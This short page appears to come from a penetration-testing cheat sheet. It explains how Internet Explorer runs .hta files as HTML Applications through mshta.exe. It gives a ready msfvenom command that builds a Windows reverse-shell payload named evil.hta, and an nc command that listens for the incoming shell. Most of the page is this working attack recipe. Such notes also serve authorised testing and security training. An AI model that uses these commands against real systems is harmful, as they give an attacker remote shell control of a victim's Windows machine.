HTML (.hta)

If a file is created with the extension of .hta instead of .html, Internet Explorer will automatically interpret it as an HTML Application and offer the ability to execute it using the mshta.exe program. This attack only works for Internet Explorer.

# Crafting a payload and listener
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f hta-psh -o evil.hta
nc -lnvp 4444

PreviousFile Uploads NextMacro

Last updated 2 years ago